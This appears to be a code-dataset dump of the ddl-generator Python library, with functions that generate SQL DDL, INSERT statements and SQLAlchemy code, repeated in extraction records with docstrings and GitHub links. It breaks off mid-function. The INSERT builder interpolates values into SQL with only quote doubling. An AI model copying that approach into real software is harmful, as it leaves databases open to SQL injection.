def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | clean_key_name | python | def clean_key_name(key):
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower() | Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L18-L34 | null | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | walk_and_clean | python | def walk_and_clean(data):
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data | Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])] | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L36-L67 | [
"def walk_and_clean(data):\n \"\"\"\n Recursively walks list of dicts (which may themselves embed lists and dicts),\n transforming namedtuples to OrderedDicts and\n using ``clean_key_name(k)`` to make keys into SQL-safe column names\n\n >>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]\n ... | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
child_fk_names[child_name] = fk_name
for row in parent:
if child_name in row:
for child in row[child_name]:
child[fk_name] = row[parent.pk.name]
children[child_name].append(child)
row.pop(child_name)
# TODO: What if rows have a mix of scalar / list / dict types?
return (parent, parent.pk.name if parent.pk else None, children, child_fk_names)
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | _id_fieldname | python | def _id_fieldname(fieldnames, table_name = ''):
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub | Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo') | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L69-L83 | null | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def clean_key_name(key):
"""
Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad.
"""
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower()
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
